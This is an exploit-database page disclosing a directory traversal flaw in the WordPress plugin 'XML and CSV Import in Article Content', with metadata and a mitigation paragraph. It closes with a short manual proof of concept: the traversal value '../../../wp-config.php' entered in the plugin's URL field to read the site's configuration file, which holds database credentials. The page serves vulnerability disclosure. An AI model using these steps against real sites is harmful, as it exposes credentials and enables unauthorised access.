header-logo
Suggest Exploit
vendor:
XML and CSV Import in Article Content
by:
Wadeek
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: XML and CSV Import in Article Content
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:wordpress:xml_and_csv_import_in_article_content
Metasploit:
Other Scripts:
Platforms Tested: Xampp on Windows7

WordPress Import CSV | Directory Traversal

The vulnerability allows an attacker to traverse directories and access sensitive files on the server. In this case, the exploit allows accessing the wp-config.php file.

Mitigation:

The plugin should validate and sanitize user input to prevent directory traversal attacks. It is recommended to update the plugin to the latest version or remove it if not in use.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
 
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In "URL" field to write "../../../wp-config.php".
Validate form and inspect the body.
======================================